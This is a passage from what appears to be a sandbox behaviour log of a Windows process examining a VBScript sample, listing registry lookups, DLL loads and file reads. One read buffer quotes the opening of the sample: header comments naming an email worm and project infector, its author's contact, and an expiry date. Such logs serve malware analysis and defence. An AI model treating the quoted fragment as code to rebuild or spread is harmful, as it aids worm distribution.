Handle => 0x00000194 Registry => 0x80000003 SubKey => S-1-5-21-1960408961-789336058-1343024091-1003 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | RegCreateKeyExW |
Handle => 0x00000190 Access => 131097 Registry => 0x00000194 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | RegCloseKey |
Handle => 0x00000194 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | RegQueryValueExW |
Handle => 0x00000190 Data => 146432 ValueName => State |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | RegCloseKey |
Handle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | RegOpenKeyExW |
Handle => 0x00000190 Registry => 0x80000003 SubKey => S-1-5-21-1960408961-789336058-1343024091-1003 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | RegOpenKeyExW |
Handle => 0x00000194 Registry => 0x00000190 SubKey => Software\Microsoft\Internet Explorer\Security |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | RegCloseKey |
Handle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | RegQueryValueExW |
Handle => 0x00000194 Data => Q\x00u\x00e\x00r\x00y\x00\x00\x00 ValueName => Safety Warning Level |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | RegCloseKey |
Handle => 0x00000194 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Policies\Microsoft\SystemCertificates\TrustedPublisher\Safer |
FAILURE | 0x00000002 | |
| 19:40:26,363 | 252 | RegOpenKeyExW |
Handle => 0x00000194 Registry => 0x80000003 SubKey => S-1-5-21-1960408961-789336058-1343024091-1003 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x00000194 SubKey => Software\Policies\Microsoft\SystemCertificates\TrustedPublisher\Safer |
FAILURE | 0x00000002 | |
| 19:40:26,363 | 252 | RegCloseKey |
Handle => 0x00000194 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\SystemCertificates\TrustedPublisher\Safer |
FAILURE | 0x00000002 | |
| 19:40:26,363 | 252 | NtCreateSection |
ObjectAttributes => DesiredAccess => 0x000f0005 SectionHandle => 0x00000194 FileHandle => 0x00000174 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | ZwMapViewOfSection |
SectionOffset => 0x0013efc0 SectionHandle => 0x00000194 ProcessHandle => 0xffffffff BaseAddress => 0x00f60000 |
SUCCESS | 0x00000000 | |
| 19:40:26,363 | 252 | NtQueryInformationFile |
FileHandle => 0x00000174 FileInformation => \x000\x00\x00\x00\x00\x00\x00\xcc$\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x00000194 Registry => 0x80000002 SubKey => Software\Microsoft\Cryptography\OID |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x00000190 Registry => 0x00000194 SubKey => EncodingType 0 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x00000000 Registry => 0x00000190 SubKey => CryptSIPDllIsMyFileType |
FAILURE | 0x00000002 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x00000194 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x00000194 Registry => 0x80000002 SubKey => Software\Microsoft\Cryptography\OID |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x00000190 Registry => 0x00000194 SubKey => EncodingType 0 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x00000198 Registry => 0x00000190 SubKey => CryptSIPDllIsMyFileType2 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 0 Handle => 0x00000198 Name => {000C10F1-0000-0000-C000-000000000046} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x0000019c Registry => 0x00000198 SubKey => {000C10F1-0000-0000-C000-000000000046} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 42 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x0000019c SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x0000019c Data => M\x00S\x00I\x00S\x00I\x00P\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x0000019c Data => M\x00s\x00i\x00S\x00I\x00P\x00I\x00s\x00M\x00y\x00T\x00y\x00p\x00e\x00O\x00f\x00F\x00i\x00l\x00e\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 1 Handle => 0x00000198 Name => {06C9E010-38CE-11D4-A2A3-00104BD35090} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x0000019c Registry => 0x00000198 SubKey => {06C9E010-38CE-11D4-A2A3-00104BD35090} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 62 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x0000019c SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x0000019c Data => C\x00:\x00\\x00W\x00I\x00N\x00D\x00O\x00W\x00S\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00w\x00s\x00h\x00e\x00x\x00t\x00.\x00d\x00l\x00l\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x0000019c Data => I\x00s\x00F\x00i\x00l\x00e\x00S\x00u\x00p\x00p\x00o\x00r\x00t\x00e\x00d\x00N\x00a\x00m\x00e\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 2 Handle => 0x00000198 Name => {1629F04E-2799-4DB5-8FE5-ACE10F17EBAB} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x0000019c Registry => 0x00000198 SubKey => {1629F04E-2799-4DB5-8FE5-ACE10F17EBAB} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 62 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x0000019c SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x0000019c Data => C\x00:\x00\\x00W\x00I\x00N\x00D\x00O\x00W\x00S\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00w\x00s\x00h\x00e\x00x\x00t\x00.\x00d\x00l\x00l\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x0000019c Data => I\x00s\x00F\x00i\x00l\x00e\x00S\x00u\x00p\x00p\x00o\x00r\x00t\x00e\x00d\x00N\x00a\x00m\x00e\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 3 Handle => 0x00000198 Name => {1A610570-38CE-11D4-A2A3-00104BD35090} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x0000019c Registry => 0x00000198 SubKey => {1A610570-38CE-11D4-A2A3-00104BD35090} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 62 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x0000019c SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x0000019c Data => C\x00:\x00\\x00W\x00I\x00N\x00D\x00O\x00W\x00S\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00w\x00s\x00h\x00e\x00x\x00t\x00.\x00d\x00l\x00l\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x0000019c Data => I\x00s\x00F\x00i\x00l\x00e\x00S\x00u\x00p\x00p\x00o\x00r\x00t\x00e\x00d\x00N\x00a\x00m\x00e\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 4 Handle => 0x00000198 Name => {1A610570-38CE-11D4-A2A3-00104BD35090} Class => |
FAILURE | 0x00000103 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x00000198 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x00000194 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x00000194 Registry => 0x80000002 SubKey => Software\Microsoft\Cryptography\OID |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 0 Handle => 0x00000194 Name => EncodingType 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x00000190 Registry => 0x00000194 SubKey => EncodingType 0 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x00000198 Registry => 0x00000190 SubKey => CryptSIPDllIsMyFileType2 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 0 Handle => 0x00000198 Name => {000C10F1-0000-0000-C000-000000000046} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x0000019c Registry => 0x00000198 SubKey => {000C10F1-0000-0000-C000-000000000046} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 42 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x0000019c SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x0000019c Data => M\x00S\x00I\x00S\x00I\x00P\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x0000019c Data => M\x00s\x00i\x00S\x00I\x00P\x00I\x00s\x00M\x00y\x00T\x00y\x00p\x00e\x00O\x00f\x00F\x00i\x00l\x00e\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 1 Handle => 0x00000198 Name => {06C9E010-38CE-11D4-A2A3-00104BD35090} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x0000019c Registry => 0x00000198 SubKey => {06C9E010-38CE-11D4-A2A3-00104BD35090} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 62 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x0000019c SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x0000019c Data => C\x00:\x00\\x00W\x00I\x00N\x00D\x00O\x00W\x00S\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00w\x00s\x00h\x00e\x00x\x00t\x00.\x00d\x00l\x00l\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x0000019c Data => I\x00s\x00F\x00i\x00l\x00e\x00S\x00u\x00p\x00p\x00o\x00r\x00t\x00e\x00d\x00N\x00a\x00m\x00e\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 2 Handle => 0x00000198 Name => {1629F04E-2799-4DB5-8FE5-ACE10F17EBAB} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x0000019c Registry => 0x00000198 SubKey => {1629F04E-2799-4DB5-8FE5-ACE10F17EBAB} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 62 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x0000019c SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x0000019c Data => C\x00:\x00\\x00W\x00I\x00N\x00D\x00O\x00W\x00S\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00w\x00s\x00h\x00e\x00x\x00t\x00.\x00d\x00l\x00l\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x0000019c Data => I\x00s\x00F\x00i\x00l\x00e\x00S\x00u\x00p\x00p\x00o\x00r\x00t\x00e\x00d\x00N\x00a\x00m\x00e\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 3 Handle => 0x00000198 Name => {1A610570-38CE-11D4-A2A3-00104BD35090} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x0000019c Registry => 0x00000198 SubKey => {1A610570-38CE-11D4-A2A3-00104BD35090} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 62 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x0000019c SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x0000019c Data => C\x00:\x00\\x00W\x00I\x00N\x00D\x00O\x00W\x00S\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00w\x00s\x00h\x00e\x00x\x00t\x00.\x00d\x00l\x00l\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x0000019c Data => I\x00s\x00F\x00i\x00l\x00e\x00S\x00u\x00p\x00p\x00o\x00r\x00t\x00e\x00d\x00N\x00a\x00m\x00e\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 4 Handle => 0x00000198 Name => {1A610570-38CE-11D4-A2A3-00104BD35090} Class => |
FAILURE | 0x00000103 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x00000198 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 1 Handle => 0x00000194 Name => EncodingType 1 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x00000190 Registry => 0x00000194 SubKey => EncodingType 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x00000000 Registry => 0x00000190 SubKey => CryptSIPDllIsMyFileType2 |
FAILURE | 0x00000002 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x00000190 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 2 Handle => 0x00000194 Name => EncodingType 1 Class => |
FAILURE | 0x00000103 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x00000194 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | LdrLoadDll |
Flags => 1306320 BaseAddress => 0x605f0000 FileName => MSISIP.DLL |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => DllCanUnloadNow FunctionAddress => 0x77a89f6c ModuleHandle => 0x605f0000 |
FAILURE | 0xc0000139 | |
| 19:40:26,373 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => MsiSIPIsMyTypeOfFile FunctionAddress => 0x605f1da1 ModuleHandle => 0x605f0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | LdrLoadDll |
Flags => 1306320 BaseAddress => 0x774e0000 FileName => ole32.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CoInitialize FunctionAddress => 0x77502a53 ModuleHandle => 0x774e0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => StgOpenStorage FunctionAddress => 0x77507394 ModuleHandle => 0x774e0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | NtCreateSection |
ObjectAttributes => C:\DfSharedHeap22F83 DesiredAccess => 0x000f0007 SectionHandle => 0x00000190 FileHandle => 0x00000000 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | ZwMapViewOfSection |
SectionOffset => 0x0013e9a8 SectionHandle => 0x00000190 ProcessHandle => 0xffffffff BaseAddress => 0x01130000 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | NtCreateFile |
ShareAccess => 1 FileName => C:\Documents and Settings\cuckoo\Local Settings\Temp\dboardman3_malware2.vbs DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000194 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | NtQueryInformationFile |
FileHandle => 0x00000194 FileInformation => \x000\x00\x00\x00\x00\x00\x00\xcc$\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | NtCreateSection |
ObjectAttributes => C:\DFMap0-143244 DesiredAccess => 0x000f0005 SectionHandle => 0x00000198 FileHandle => 0x00000194 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | NtQueryInformationFile |
FileHandle => 0x00000194 FileInformation => \x000\x00\x00\x00\x00\x00\x00\xcc$\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | ZwMapViewOfSection |
SectionOffset => 0x0013e2d4 SectionHandle => 0x00000198 ProcessHandle => 0xffffffff BaseAddress => 0x00f60000 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\cuckoo\Local Settings\Temp\dboardman3_malware2.vbs DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000194 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | NtReadFile |
Buffer => Rem VBS.W32.I-worm.Vabian
Rem Script Project Infector [pas,frm,cpp]
Rem By Psychologic aka Puppy
Rem Mailto : Psychologic@hotmail.com
'sending filename
'x=msgbox(Wscript.ScriptName, 0, "Title")
'malware expires....
date2 = #06/01/2018#
date1 = FileHandle => 0x00000194 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => CoUninitialize FunctionAddress => 0x774fee46 ModuleHandle => 0x774e0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | LdrLoadDll |
Flags => 1305876 BaseAddress => 0x77a80000 FileName => C:\WINDOWS\system32\CRYPT32.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | CreateThread |
ThreadId => 412 StartRoutine => 0x77a8964d Parameter => 0x00194650 CreationFlags => 0 |
SUCCESS | 0x00000198 | |
| 19:40:26,373 | 252 | LdrLoadDll |
Flags => 1306320 BaseAddress => 0x7dfa0000 FileName => C:\WINDOWS\system32\wshext.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => DllCanUnloadNow FunctionAddress => 0x7dfa17cc ModuleHandle => 0x7dfa0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => IsFileSupportedName FunctionAddress => 0x7dfa17fd ModuleHandle => 0x7dfa0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x0000019c Registry => 0x80000002 SubKey => Software\Microsoft\Cryptography\OID |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 0 Handle => 0x0000019c Name => EncodingType 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a0 Registry => 0x0000019c SubKey => EncodingType 0 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a4 Registry => 0x000001a0 SubKey => CryptSIPDllPutSignedDataMsg |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 0 Handle => 0x000001a4 Name => {000C10F1-0000-0000-C000-000000000046} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a8 Registry => 0x000001a4 SubKey => {000C10F1-0000-0000-C000-000000000046} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 46 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x000001a8 SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x000001a8 Data => M\x00S\x00I\x00S\x00I\x00P\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x000001a8 Data => M\x00s\x00i\x00S\x00I\x00P\x00P\x00u\x00t\x00S\x00i\x00g\x00n\x00e\x00d\x00D\x00a\x00t\x00a\x00M\x00s\x00g\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 1 Handle => 0x000001a4 Name => {06C9E010-38CE-11D4-A2A3-00104BD35090} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a8 Registry => 0x000001a4 SubKey => {06C9E010-38CE-11D4-A2A3-00104BD35090} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 62 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x000001a8 SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x000001a8 Data => C\x00:\x00\\x00W\x00I\x00N\x00D\x00O\x00W\x00S\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00w\x00s\x00h\x00e\x00x\x00t\x00.\x00d\x00l\x00l\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x000001a8 Data => P\x00u\x00t\x00S\x00i\x00g\x00n\x00e\x00d\x00D\x00a\x00t\x00a\x00M\x00s\x00g\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 2 Handle => 0x000001a4 Name => {1629F04E-2799-4DB5-8FE5-ACE10F17EBAB} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a8 Registry => 0x000001a4 SubKey => {1629F04E-2799-4DB5-8FE5-ACE10F17EBAB} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 62 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x000001a8 SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x000001a8 Data => C\x00:\x00\\x00W\x00I\x00N\x00D\x00O\x00W\x00S\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00w\x00s\x00h\x00e\x00x\x00t\x00.\x00d\x00l\x00l\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x000001a8 Data => P\x00u\x00t\x00S\x00i\x00g\x00n\x00e\x00d\x00D\x00a\x00t\x00a\x00M\x00s\x00g\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 3 Handle => 0x000001a4 Name => {1A610570-38CE-11D4-A2A3-00104BD35090} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a8 Registry => 0x000001a4 SubKey => {1A610570-38CE-11D4-A2A3-00104BD35090} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 62 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x000001a8 SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x000001a8 Data => C\x00:\x00\\x00W\x00I\x00N\x00D\x00O\x00W\x00S\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00w\x00s\x00h\x00e\x00x\x00t\x00.\x00d\x00l\x00l\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x000001a8 Data => P\x00u\x00t\x00S\x00i\x00g\x00n\x00e\x00d\x00D\x00a\x00t\x00a\x00M\x00s\x00g\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 4 Handle => 0x000001a4 Name => {9BA61D3F-E73A-11D0-8CD2-00C04FC295EE} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a8 Registry => 0x000001a4 SubKey => {9BA61D3F-E73A-11D0-8CD2-00C04FC295EE} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
